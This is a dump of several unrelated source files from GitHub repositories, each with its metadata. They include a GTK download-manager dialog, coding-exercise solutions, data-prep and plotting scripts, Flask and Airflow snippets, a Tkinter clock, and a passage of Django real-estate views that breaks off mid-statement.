1)\n\n entry = Gtk.Entry(activates_default=True, tooltip_text=tooltip)\n entry.set_placeholder_text(tooltip)\n grid.attach(entry, 1, 1, 3, 1)\n self._task_options['all-proxy'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n # Authorization\n expander = AlignedExpander(_('Authorization'), expanded=False)\n expander.connect_after('activate', self.update_size)\n vbox.pack_start(expander, expand=False)\n\n grid = Grid()\n expander.add(grid)\n\n label = RightAlignedLabel(_('HTTP User:'))\n grid.attach(label, 0, 0)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 1, 0)\n self._task_options['http-user'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Password:'))\n grid.attach(label, 2, 0)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 3, 0)\n self._task_options['http-passwd'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('FTP User:'))\n grid.attach(label, 0, 1)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 1, 1)\n self._task_options['ftp-user'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n label = RightAlignedLabel(_('Password:'))\n grid.attach(label, 2, 1)\n\n entry = Gtk.Entry(activates_default=True)\n grid.attach(entry, 3, 1)\n self._task_options['ftp-passwd'] = _Option(entry, 'text',\n _Option.string_mapper)\n\n self.show_all()\n\n @property\n def default_ui(self):\n \"\"\"Get the default UI.\"\"\"\n if self._default_ui is None:\n ui = _TaskNewDefaultUI(self._task_options, self)\n ui.uri_entry.connect('response', self._on_metafile_selected)\n ui.uri_entry.connect('changed', self._on_default_entry_changed)\n self._default_ui = ui\n return self._default_ui\n\n @property\n def normal_ui(self):\n \"\"\"Get the normal UI.\"\"\"\n if self._normal_ui is None:\n ui = _TaskNewNormalUI(self._task_options)\n text_buffer = ui.uris_view.text_buffer\n text_buffer.connect('changed', self._on_normal_uris_view_changed)\n self._normal_ui = ui\n return self._normal_ui\n\n @property\n def bt_ui(self):\n \"\"\"Get the BT UI.\"\"\"\n if self._bt_ui is None:\n self._bt_ui = _TaskNewBTUI(self._task_options)\n return self._bt_ui\n\n @property\n def ml_ui(self):\n \"\"\"Get the ML UI.\"\"\"\n if self._ml_ui is None:\n self._ml_ui = _TaskNewMLUI(self._task_options)\n return self._ml_ui\n\n def _on_advanced_expander_activated(self, expander, buttons):\n \"\"\"When advanced button activated, show or hide advanced buttons.\"\"\"\n for button in buttons:\n if expander.get_expanded():\n button.show()\n else:\n button.hide()\n\n def _on_category_cb_changed(self, category_cb, entry):\n \"\"\"When category combo box changed, update the directory entry.\"\"\"\n iter_ = category_cb.get_active_iter()\n model = category_cb.get_model()\n presentable = model.get_value(iter_, PoolModel.COLUMNS.PRESENTABLE)\n entry.set_text(presentable.directory)\n self.logger.debug('Category is changed to {}.'.format(presentable))\n\n def _on_metafile_selected(self, dialog, response_id):\n \"\"\"When meta file chooser dialog responsed, switch to torrent or metalink\n mode.\"\"\"\n if response_id == Gtk.ResponseType.ACCEPT:\n filename = dialog.get_filename()\n current_filter = dialog.get_filter().get_name()\n if current_filter == _BT_FILTER_NAME:\n self.logger.info(\n 'Torrent file selected, changing to bittorrent UI...')\n self.set_ui(self.bt_ui, {'torrent_filename': filename})\n elif current_filter == _ML_FILTER_NAME:\n self.logger.info(\n 'Metalink file selected, changing to metalink UI...')\n self.set_ui(self.ml_ui, {'metalink_filename': filename})\n else:\n raise RuntimeError('No such filter' + current_filter)\n\n def _on_default_entry_changed(self, entry):\n \"\"\"When the entry in the default content box changed, switch to normal\n mode.\"\"\"\n # When default UI activated, the entry text is cleared, we should\n # ignore this.\n if self._ui is not self.normal_ui:\n self.logger.info('URIs inputed, changing to normal UI...')\n self.set_ui(self.normal_ui, {'uris': entry.get_text()})\n\n def _on_normal_uris_view_changed(self, text_buffer):\n \"\"\"When the uris view in the normal UI cleared, switch to default mode.\"\"\"\n if text_buffer.get_property('text') == '':\n self.logger.info('URIs cleared, changing to default UI...')\n self.set_ui(self.default_ui, {'uris': ''})\n elif self._ui is not self.normal_ui:\n # When it's already the normal UI, and the text of the\n # URIs view is set (from the browser), the textview will\n # firstly been cleared, and it changes to default UI,\n # in this case we need to set the UI back to normal UI.\n self.set_ui(self.normal_ui, {})\n\n def do_response(self, response_id):\n \"\"\"Create a new download task if uris are provided.\"\"\"\n if not self._ui.response(response_id):\n self.hide()\n\n def set_ui(self, new_ui, options=None):\n \"\"\"Set the UI of the dialog.\"\"\"\n # Remove current child of uris_expander\n if self._ui is not new_ui:\n main_vbox = self._main_vbox\n if self._ui is not None:\n main_vbox.remove(self._ui.uris_expander)\n main_vbox.pack_start(new_ui.uris_expander)\n main_vbox.reorder_child(new_ui.uris_expander, 0)\n\n if new_ui is self.default_ui:\n # Hide the advanced buttons when changing to default UI\n if self.advanced_expander.get_expanded():\n self.advanced_expander.emit('activate')\n self.advanced_expander.hide()\n self.save_expander.hide()\n else:\n self.advanced_expander.show_all()\n self.save_expander.show_all()\n\n if self._ui is not None:\n self._ui.deactivate()\n\n new_ui.activate(options)\n\n self.update_size()\n\n self._ui = new_ui\n\n def update_size(self, widget=None):\n \"\"\"Update the size of the dialog.\"\"\"\n content_area = self.get_content_area()\n size = content_area.get_preferred_size()[0]\n self.resize(size.width, size.height)\n\n def run(self, options=None):\n \"\"\"Popup new task dialog.\"\"\"\n if options is None:\n self.set_ui(self.default_ui, {'uris': ''})\n elif 'torrent_filename' in options:\n self.set_ui(self.bt_ui, options)\n elif 'metalink_filename' in options:\n self.set_ui(self.ml_ui, options)\n else:\n self.set_ui(self.normal_ui, options)\n\n self.logger.info('Running new task dialog...')\n\n Gtk.Dialog.run(self)\n\nclass PreferencesDialog(Gtk.Dialog, LoggingMixin):\n \"\"\"Dialog for global preferences.\"\"\"\n def __init__(self, *args, **kwargs):\n Gtk.Dialog.__init__(self,\n title=_('Preferences'),\n buttons=(Gtk.STOCK_CLOSE, Gtk.ResponseType.CLOSE),\n *args, **kwargs)\n LoggingMixin.__init__(self)\n\n self.preferences = {}\n\n ### Content Area\n content_area = self.get_content_area()\n\n notebook = Gtk.Notebook()\n content_area.add(notebook)\n\n ## General Page\n label = Gtk.Label(_('General'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n ## Download Page\n label = Gtk.Label(_('Download'))\n vbox = Box(VERTICAL, border_width=5)\n notebook.append_page(vbox, label)\n\n grid = Grid()\n vbox.pack_start(grid, expand=False)\n\n label = RightAlignedLabel(_('Max Concurrent Tasks:'))\n grid.attach(label, 0, 0)\n\n adjustment = Gtk.Adjustment(lower=1, upper=64, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 1, 0)\n self._preferences['max-concurrent-downloads'] = _Option(\n spin_button, 'value', _Option.int_mapper)\n\n label = RightAlignedLabel(_('Global Upload Limit(KiB/s):'))\n grid.attach(label, 0, 1)\n\n adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 1, 1)\n self._preferences['max-overall-upload-limit'] = _Option(\n spin_button, 'value', _Option.kib_mapper)\n\n label = RightAlignedLabel(_('Global Download Limit(KiB/s):'))\n grid.attach(label, 0, 2)\n\n adjustment = Gtk.Adjustment(lower=0, upper=4096, step_increment=1)\n spin_button = Gtk.SpinButton(adjustment=adjustment, numeric=True)\n grid.attach(spin_button, 1, 2)\n self._preferences['max-overall-download-limit'] = _Option(\n spin_button, 'value', _Option.kib_mapper)\n\n self.show_all()\n\n def run(self, options=None):\n \"\"\"Popup new task dialog.\"\"\"\n self.logger.info('Running preferences dialog...')\n\n Gtk.Dialog.run(self)\n self.hide()\n\n","repo_name":"iven/Yaner","sub_path":"yaner/ui/Dialogs.py","file_name":"Dialogs.py","file_ext":"py","file_size_in_byte":38882,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"43"} +{"seq_id":"40555514254","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'breakingRecords' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts INTEGER_ARRAY scores as parameter.\n#\n\n\ndef breakingRecords(scores):\n minScore, maxScore, minCount, maxCount = scores[0], scores[0], 0, 0\n for score in scores:\n if score < minScore:\n minScore = score\n minCount += 1\n if score > maxScore:\n maxScore = score\n maxCount += 1\n\n print(f\"[MAX, MIN] = {[maxCount,minCount]}\")\n return [maxCount, minCount]\n\n\nif __name__ == \"__main__\":\n fptr = open(\"hackerRank/input.file\", \"r\")\n num_records = fptr.readline()\n records = fptr.readline()\n fptr.close()\n scores = list(map(int, records.rstrip().split()))\n records_break = breakingRecords(scores=scores)\n print(f\"Record Broken: Higgest - {records_break[0]} | Lowest - {records_break[1]}\")\n","repo_name":"Gunjan7991/coding_problem_solving","sub_path":"python_solver/hackerRank/Breaking_the_Records.py","file_name":"Breaking_the_Records.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"10874987684","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\nimport pandas as pd\nimport numpy as np\nfrom transformers import CamembertTokenizerFast\n\nimport scripts.utils as utils\n\nclass JsonlDoccano:\n\n def __init__(self, filepath, camembert=True, shuffle_file_path='scripts/data/labels_augmentation.parquet', labels_augmentation=2, back_translation=False):\n if camembert:\n self.TOKENIZER = CamembertTokenizerFast.from_pretrained(\n 'camembert-base',\n do_lower_case=True, encoding='utf-8').tokenize\n else:\n self.TOKENIZER = str.split\n \n self.camembert = camembert\n \n self.filepath = filepath\n self.shuffle_file_path = shuffle_file_path\n self.json_file = utils.read_jsonl(filepath=self.filepath, encoding='utf-8').to_pandas(self.TOKENIZER)\n self.df = self.to_pandas()\n self.labels = self.df[self.df['label'] != 'O']\n self.sentences = self.labels.id_phrase.unique()\n\n self.labels_augmentation = labels_augmentation\n self.back_translation = back_translation\n\n def to_pandas(self):\n list_df = []\n for entry in self.json_file:\n list_df.append(list(entry))\n df = pd.DataFrame(list_df, columns=['token', 'label', 'id_phrase'])\n return df\n\n def run_export(self, resultpath, augmented=False):\n if augmented:\n self.df_augmented.to_parquet(resultpath)\n else:\n self.df.to_parquet(resultpath)\n return\n \n def shuffle_labels(self, df_shuffle_tokens):\n \n json_file = utils.read_jsonl(filepath=self.filepath, encoding='utf-8').to_pandas(self.TOKENIZER)\n list_df = []\n remplace = False\n for entry in json_file:\n if entry[2] in self.sentences:\n if remplace and entry[1].startswith('I'):\n continue\n remplace = False\n\n if entry[1].startswith('B'):\n label = entry[1][2:]\n if label in ['Drug', 'Form']:\n line = df_shuffle_tokens[df_shuffle_tokens.label == label].sample(1)\n for element in line['tokens'].to_numpy()[0]:\n list_df.append(np.append(element, entry[2]))\n remplace = True\n continue\n\n list_df.append(list(entry))\n\n shuffled_df = pd.DataFrame(list_df, columns=['token', 'label', 'id_phrase'])\n return shuffled_df\n\n\n @property\n def df_augmented(self):\n shuffled_dfs = [self.df]\n df_shuffle_tokens = pd.read_parquet(self.shuffle_file_path)\n for i in range(self.labels_augmentation):\n shuffled_dfs.append(self.shuffle_labels(df_shuffle_tokens))\n if self.back_translation:\n shuffled_dfs.append(pd.read_parquet('scripts/data/back_translated.parquet'))\n df_augmented = pd.concat(shuffled_dfs)\n return df_augmented\n ","repo_name":"francoisschmerber/Drug_Posology_NLP_Quinten","sub_path":"code/tokens_labels_management/doccano_to_camembert.py","file_name":"doccano_to_camembert.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10403624450","text":"import asyncio\nfrom concurrent.futures import ProcessPoolExecutor\nfrom time import time\n\n\ndef cpu_bound_task(counter):\n init = counter\n while counter > 0:\n counter -= 1\n print(f'Completed cpu_bound_task with: {init}')\n return f'Completed cpu_bound_task with: {init}'\n\n\nasync def send_data():\n while True:\n await asyncio.sleep(1)\n print(f'Send to https://for.me: {time()}')\n\n\nasync def async_worker():\n loop = asyncio.get_running_loop()\n sd = loop.create_task(send_data())\n\n with ProcessPoolExecutor(2) as pool:\n futures = [loop.run_in_executor(pool, cpu_bound_task, num) for num in [60_000_000, 70_000_000, 80_000_000]]\n result = await asyncio.gather(*futures)\n sd.cancel()\n return result\n\n\nasync def main():\n r = await async_worker()\n return r\n\n\nif __name__ == '__main__':\n r = asyncio.run(main())\n print(r)\n","repo_name":"Krabaton/Py9Web","sub_path":"m05_01/08_cpu_bound.py","file_name":"08_cpu_bound.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"43"} +{"seq_id":"11872332168","text":"from flask import request,jsonify,make_response,Blueprint\nfrom ..models.students import Student\nfrom ..extensions.database import db\n\n\n#function to create a student\n\ndef create_student(name,age):\n return Student(name=name,age=age)\n\napi_bp=Blueprint('api',__name__)\n\n@api_bp.route('/hello')\ndef hello():\n return jsonify({\"message\":\"Hello\"})\n\n@api_bp.route('/',methods=['POST'])\ndef create_record():\n data=request.get_json()\n\n name=data.get('name')\n\n age=data.get('age')\n\n create_student(name=name,age=age).save()\n\n return jsonify({\"message\":\"Created\",\n \"student\":{\n \"name\":name,\n \"age\":age\n }\n })","repo_name":"jod35/flask-vanillajs-fullstack-app","sub_path":"main/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"9096999983","text":"#This program is meant to allow the user to enter a non-negative integar and use a loop to calculate the factorial of the loop.\r\n\r\nfrom itertools import count\r\n\r\n\r\nuserIntegar = int(input(\"Please enter a postive number: \"))\r\n\r\n#This takes the input from a user and holds it as a constant integar. \r\n\r\ncountNumber = int(1)\r\nholdingSolution = int(1)\r\n\r\n#I declare the integar variables here. countNumber is meant to count upwards till it exceeds the userIntegar number. holdingSolution is meant to multiple against countNumber and hold the solution to the problem. \r\n\r\nwhile countNumber <= userIntegar:\r\n holdingSolution = holdingSolution * countNumber\r\n countNumber += 1\r\n\r\n#The goal of this while statement is to determine the factorial of userIntegar. \r\n\r\nprint(\"The factorial of\", userIntegar,\"is\", holdingSolution, \".\")\r\n\r\n#This last print statement outputs the intital number and the factorial solution. \r\n\r\n","repo_name":"Tmmcmasters/SDEV-140-Python-Challenges","sub_path":"M02/McMastersTimothyM02_M02Ex2.py","file_name":"McMastersTimothyM02_M02Ex2.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"2066171201","text":"import pandas as pd\nimport re\n\nclass TransformHeadData():\n \n __regExp = \"[a-zA-Z0-9ñÑáéíóúÁÉÍÓÚ\\s]+[^\\/\\s\\n]+\"\n \n def __init__(self, df, subTitlesColumns):\n self.__df = df\n self.__subtitlesColumns = subTitlesColumns\n self.__lengthDF = len(df.columns)\n \n def getDF(self):\n self.__transformHeadData()\n return self.__df\n \n def __transformHeadData(self):\n for index in range(self.__subtitlesColumns):\n self.__editHeader(index)\n self.__addDataTitle(index)\n \n def __editHeader(self, column):\n x = 0\n while x < self.__lengthDF:\n if pd.isna(self.__df[x][column]) != True:\n self.__df[x][column] = re.findall(self.__regExp, self.__df[x][column])[0]\n x = x + 1\n \n def __addDataTitle(self, column):\n x = 0\n while x < self.__lengthDF:\n if pd.isna(self.__df[x][column]) == True and x == 0:\n x = x + 1\n continue\n if pd.isna(self.__df[x][column]) == True:\n self.__df[x][column] = self.__df[x - 1][column]\n x = x + 1","repo_name":"RamsesCamacho1171/airflow_prueba","sub_path":"dags/dag_InformacionEstadisticaInvencionesSignosDistintivos/methods/transform/TransformHeadData.py","file_name":"TransformHeadData.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35152541652","text":"import time\nfrom tkinter import *\n\n# Creating UI\nroot = Tk()\n\nroot.title(\"Ashura-Clock\")\n\nroot.geometry(\"600x600\")\n\nroot.config(bg=\"Black\")\n\n# Functions\ndef clock():\n h = str(time.strftime(\"%H\"))\n m = str(time.strftime(\"%M\"))\n s = str(time.strftime(\"%S\"))\n# If statements\n if int(h) > 12 and int(m) > 0:\n label_noon.config(text=\"PM\")\n\n if int(h)>12:\n h = str((int(h)-12))\n\n\n label_hr.config(text=h)\n label_mn.config(text=m)\n label_sc.config(text=s)\n\n label_hr.after(200, clock)\n\n\n\n# Label for Hours\nlabel_hr = Label(root, text=\"12\", font=(\"times new roman\",40, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_hr.place(x=100, y=50, width=80, height=60)\n\nlabel_hr2 = Label(root, text=\"Hours\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_hr2.place(x=100, y=120, width=80, height=40)\n\n# Label for Minutes\nlabel_mn = Label(root, text=\"12\", font=(\"times new roman\",40, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_mn.place(x=200, y=50, width=80, height=60)\n\nlabel_mn2 = Label(root, text=\"Minute\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Green\")\nlabel_mn2.place(x=200, y=120, width=80, height=40)\n\n# Label for Seconds\nlabel_sc = Label(root, text=\"12\", font=(\"times new roman\",40, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_sc.place(x=300, y=50, width=80, height=60)\n\nlabel_sc2 = Label(root, text=\"Sec\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_sc2.place(x=300, y=120, width=80, height=40)\n\n# Label For AM = PM\nlabel_noon = Label(root, text=\"AM\", font=(\"times new roman\",25, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_noon.place(x=400, y=50, width=80, height=60)\n\nlabel_noon2 = Label(root, text=\"Noon\", font=(\"times new roman\",20, \"bold\"), fg=\"white\", bg=\"Red\")\nlabel_noon2.place(x=400, y=120, width=80, height=40)\n\n# calling the function in loop\nclock()\nroot.mainloop()\n","repo_name":"Ashura-Sheikh/TK-Clock","sub_path":"clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30858769031","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\n#Bibliotecas necessárias\nimport configparser\nimport h5py\nimport numpy as np\nimport pynbody\nimport pynbody.plot.sph as sph\nimport matplotlib.pyplot as plt\nfrom sys import argv\n\n'''\ngalmock.py\n\nThis python program adapts hdf5 snapshots of n-body simulations of isolated galaxies that use star formation, such as those from GADGET-4, allowing the plotting of realistic visualizations that take into account metallicity and particle age of the simulated galaxy.\n\nUsage:\npython3 galmock.py [snapshot --hdf5]\n'''\n\n########################################################################\n# cria o objeto ConfigParser\nconfig = configparser.ConfigParser()\n\n# lê o arquivo .ini\nconfig.read('param.ini')\n\n# obtém os valores da seção \"plot\"\nwidth = config.get('plot', 'width')\nresolution = config.getint('plot', 'resolution')\nstarsize = config.getfloat('plot', 'starsize')\ngalrot = config.getint('plot', 'galrot')\n\n# obtém os valores da seção \"filters\"\nr_scale = config.getfloat('filters', 'r_scale')\ng_scale = config.getfloat('filters', 'g_scale')\nb_scale = config.getfloat('filters', 'b_scale')\ndynamic_range = config.getfloat('filters', 'dynamic_range')\n \n# obtém os valores da seção \"disk\"\ndiskp = config.get('disk', 'diskp')\nmetaldisk = config.getfloat('disk', 'metaldisk')\nmin_metaldisk = config.get('disk', 'min_metaldisk')\n########################################################################\n\n# Define ordem do argumento ao iniciar o programa, no caso o argumento é o nome do seu snapshot a ser lido\nsnapshotIn = str(argv[1])\n\n#Atribuindo o do argumento 1 para o título do snapshot escolhido para ser lido pelo h5py\ns = h5py.File(snapshotIn, \"r\")\n\n#lendo as partículas tipo stars do arquivo hdf5\ns_star = s['PartType4']\n\n#importando partículas tipo disk caso existam\nif 'PartType2' in h5py.File(snapshotIn, \"r\"):\n s_disk = s['PartType2']\n\n#importando tempo do snapshot\ns_time = s['Header'].attrs['Time']\n\n#importando informações das partículas tipo stars\nstar_x = np.array(s_star['Coordinates'][:,0])\nstar_y = np.array(s_star['Coordinates'][:,1])\nstar_z = np.array(s_star['Coordinates'][:,2])\nstar_mass = np.array(s_star['Masses'])\nstar_metal = np.array(s_star['Metallicity'])\nstar_age = np.array(s_star['StellarFormationTime'])\n\n#obtendo valores mínimos da idade e metalicidade das partículas stars\nstar_min_met = np.min(star_metal)\nstar_min_age = np.min(star_age)\n\n#importando informações das partículas tipo disco caso existam\nif 'PartType2' in h5py.File(snapshotIn, \"r\"): \n disk_x = np.array(s_disk['Coordinates'][:,0])\n disk_y = np.array(s_disk['Coordinates'][:,1])\n disk_z = np.array(s_disk['Coordinates'][:,2])\n disk_mass = np.array(s_disk['Masses'])\n disk_metal = np.array(s_disk['Metallicity'])\n #atribuindo um valor de metalicidade para o disco de acordo com a escolha da variavel min)metaldisk do arquivo param.ini\n if min_metaldisk == 'True':\n for i in range(len(disk_metal)):\n disk_metal[i] += star_min_met\n else:\n for i in range(len(disk_metal)):\n disk_metal[i] += metaldisk\n \n disk_age = np.array(s_disk['StellarFormationTime'])\n for i in range(len(disk_age)):\n disk_age[i] += star_min_age\n\n \n\n#decisão se há concatenação das partículsa tipo disco e stars ou se será considerado apenas estrelas de acordo com a escolha no arquivo param.ini \nif diskp == 'False':\n x = star_x\n y = star_y\n z = star_z\n mass = star_mass\n metal = star_metal\n age = star_age\nelse:\n x = np.concatenate((disk_x, star_x), axis=0)\n y = np.concatenate((disk_y, star_y), axis=0)\n z = np.concatenate((disk_z, star_z), axis=0)\n mass = np.concatenate((disk_mass, star_mass), axis=0)\n metal = np.concatenate((disk_metal, star_metal), axis=0)\n age = np.concatenate((disk_age, star_age), axis=0)\n\n#correção de centro de massa do snapshot\ncom_x = np.sum(x*mass)/np.sum(mass)\ncom_y = np.sum(y*mass)/np.sum(mass)\ncom_z = np.sum(z*mass)/np.sum(mass)\n\nx = (x - com_x)\ny = (y - com_y)\nz = (z - com_z)\n\n\n#atribuindo Sim.Arrays para o pynobdy\nNstars = len(mass)\np = pynbody.snapshot.new(star=int(Nstars))\np.star['pos'] = pynbody.array.SimArray(np.empty((Nstars, 3)), units=\"kpc\")\np.star['mass'] = pynbody.array.SimArray(np.empty((Nstars)), units=\"1.00e+10 Msol\")\np.star['metals'] = pynbody.array.SimArray(np.empty((Nstars)), units=None)\np.star['age'] = pynbody.array.SimArray(np.empty((Nstars)), units=\"Gyr\")\n\np.star['pos'][:,0] = x\np.star['pos'][:,1] = y\np.star['pos'][:,2] = z\np.star['mass'] = mass\np.star['metals'] = metal\np.star['age'] = s_time - age #pequena correção do tempo das partículas para formato esperado pela função do pynbody\np.stars.rotate_x(galrot)\n\n#plotagem\npynbody.plot.stars.render(p, width=width, resolution=resolution, starsize=starsize, r_scale=r_scale, g_scale=g_scale, b_scale=b_scale, dynamic_range=dynamic_range, plot=True)\n\n#salvando arquivo com a imagem gerada e dando nome de acordo com o tempo do snapshot\nplt.savefig('galmock_'+str(\"%.2f\"%s_time)+'.png', bbox_inches='tight', facecolor='white', dpi=300)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Gustavosh23/galmock","sub_path":"galmock.py","file_name":"galmock.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19533524828","text":"from datetime import datetime\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\nfrom rest_framework.response import Response\n\nfrom estate_app.core.clean_up_images import clean_up_image_files\nfrom estate_app.core.paginator import create_paginator\nfrom estate_app.core.validator import validate_creator\nfrom estate_app.forms import AdditionalFilterForm, AdForm\nfrom estate_app.models import District, DistrictCity, DistrictCityArea, Ad\nfrom estate_app.core.sort_filter import process_filter_input\nfrom rest_framework import views as rest_views\n\nfrom estate_app.serializer import AdSerializer\n\n\nclass AboutUsTemplateView(TemplateView):\n template_name = 'about_us.html'\n\n\nclass GeneralRulesTemplateView(TemplateView):\n template_name = 'general_rules.html'\n\n\ndef load_home_page(request):\n districts = District.objects.all()\n cities = DistrictCity.objects.all()\n areas = DistrictCityArea.objects.all()\n ads = Ad.objects.all()\n\n context = {\n 'districts': districts,\n 'cities': cities,\n 'areas': areas,\n 'ads': ads,\n }\n filterinput = AdditionalFilterForm(request.GET)\n list_ads = []\n if filterinput.data.get('reference_number'):\n ref_num = filterinput.data.get('reference_number')\n ad = Ad.objects.filter(pk=ref_num, approved=True)\n if len(ad) > 0:\n ad[0].can_modify = request.user.is_superuser or ad.created_by == request.user\n list_ads.append(ad[0])\n context['filterinput'] = filterinput\n else:\n context = process_filter_input(request, context, ads, filterinput)\n list_ads = context['ads']\n context['page_obj'] = create_paginator(request, list_ads)\n return render(request, 'home_page.html', context)\n\n\ndef district(request, pk):\n selected_district = District.objects.get(pk=pk)\n cities = DistrictCity.objects.filter(district_id=pk)\n areas = DistrictCityArea.objects.all()\n ads = Ad.objects.filter(district=selected_district)\n context = {\n 'district': selected_district,\n 'cities': cities,\n 'areas': areas,\n 'ads': ads,\n }\n filterinput = AdditionalFilterForm(request.GET)\n list_ads = []\n if filterinput.data.get('reference_number'):\n ref_num = filterinput.data.get('reference_number')\n ad = Ad.objects.filter(pk=ref_num, approved=True)\n if len(ad) > 0:\n ad[0].can_modify = request.user.is_superuser or ad.created_by == request.user\n list_ads.append(ad[0])\n context['filterinput'] = filterinput\n else:\n context = process_filter_input(request, context, ads, filterinput)\n list_ads = context['ads']\n context['page_obj'] = create_paginator(request, list_ads)\n return render(request, 'district_page.html', context)\n\n\ndef city(request, pk):\n selected_city = DistrictCity.objects.get(pk=pk)\n selected_district = District.objects.get(pk=selected_city.district_id)\n areas = DistrictCityArea.objects.filter(city_id=pk)\n ads = Ad.objects.filter(district=selected_district, city=selected_city)\n context = {\n 'district': selected_district,\n 'city': selected_city,\n 'areas': areas,\n 'ads': ads,\n }\n filterinput = AdditionalFilterForm(request.GET)\n list_ads = []\n if filterinput.data.get('reference_number'):\n ref_num = filterinput.data.get('reference_number')\n ad = Ad.objects.filter(pk=ref_num, approved=True)\n if len(ad) > 0:\n ad[0].can_modify = request.user.is_superuser or ad.created_by == request.user\n list_ads.append(ad[0])\n context['filterinput'] = filterinput\n else:\n context = process_filter_input(request, context, ads, filterinput)\n list_ads = context['ads']\n context['page_obj'] = create_paginator(request, list_ads)\n return render(request, 'city_page.html', context)\n\n\ndef area(request, pk):\n selected_area = DistrictCityArea.objects.get(pk=pk)\n selected_city = DistrictCity.objects.get(pk=selected_area.city_id)\n selected_district = District.objects.get(pk=selected_city.district_id)\n ads = Ad.objects.filter(district=selected_district, city=selected_city, area=selected_area)\n context = {\n 'district': selected_district,\n 'city': selected_city,\n 'area': selected_area,\n 'ads': ads,\n }\n filterinput = AdditionalFilterForm(request.GET)\n list_ads = []\n if filterinput.data.get('reference_number'):\n ref_num = filterinput.data.get('reference_number')\n ad = Ad.objects.filter(pk=ref_num, approved=True)\n if len(ad) > 0:\n ad[0].can_modify = request.user.is_superuser or ad.created_by == request.user\n list_ads.append(ad[0])\n context['filterinput'] = filterinput\n else:\n context = process_filter_input(request, context, ads, filterinput)\n list_ads = context['ads']\n context['page_obj'] = create_paginator(request, list_ads)\n return render(request, 'area_page.html', context)\n\n\ndef show_details(request, pk):\n ad = Ad.objects.get(pk=pk)\n if request.user.id != ad.created_by_id:\n ad.increase_counter_seen()\n ad.save()\n context = {\n 'ad': ad,\n }\n return render(request, 'details.html', context)\n\n\ndef approve_ad(request, pk):\n previous_url = request.META.get('HTTP_REFERER')\n ad_to_approve = Ad.objects.get(pk=pk)\n ad_to_approve.approved = True\n ad_to_approve.rejected = False\n ad_to_approve.comments_reject=''\n ad_to_approve.save()\n return redirect(previous_url)\n\n\ndef reject_ad(request, pk):\n ad = Ad.objects.get(pk=pk)\n context = {\n 'ad_to_reject': AdForm(),\n 'ad': ad,\n }\n if request.method == \"GET\":\n return render(request, 'reject_ad.html', context)\n else:\n comment = request.POST.get('comments_reject')\n ad.rejected = True\n ad.comments_reject = comment\n ad.save()\n return redirect('show details', ad.pk)\n\n\n@login_required()\ndef create_ad(request):\n previous_url = request.META.get('HTTP_REFERER')\n if request.method == 'GET':\n ad_form = AdForm()\n context = {\n 'ad_form': ad_form,\n 'previous_url': previous_url\n }\n return render(request, 'create_ad.html', context)\n else:\n\n ad_form = AdForm(request.POST, request.FILES or None)\n if ad_form.is_valid():\n form = ad_form.save(commit=False)\n form.created_by = request.user\n form.save()\n return redirect('show details', form.id)\n else:\n context = {\n 'ad_form': AdForm(request.POST, request.FILES, instance=ad_form)\n }\n return render(request, 'create_ad.html', context)\n\n\n@login_required()\ndef edit_ad(request, pk):\n previous_url = request.META.get('HTTP_REFERER')\n ad_to_edit = Ad.objects.get(pk=pk)\n validate_creator(ad_to_edit, request.user)\n if request.method == 'GET':\n context = {\n 'ad_form': AdForm(instance=ad_to_edit),\n 'reference_number': pk,\n 'previous_url': previous_url\n }\n return render(request, 'edit_ad.html', context)\n else:\n ad_form = AdForm(request.POST, request.FILES or None, instance=ad_to_edit)\n if ad_form.is_valid():\n form = ad_form.save(commit=False)\n form.date_modified = datetime.now()\n form.approved = False\n form.rejected = False\n form.comments_reject = ''\n form.save()\n return redirect('show details', pk)\n else:\n context = {\n 'ad_form': ad_form,\n }\n return render(request, 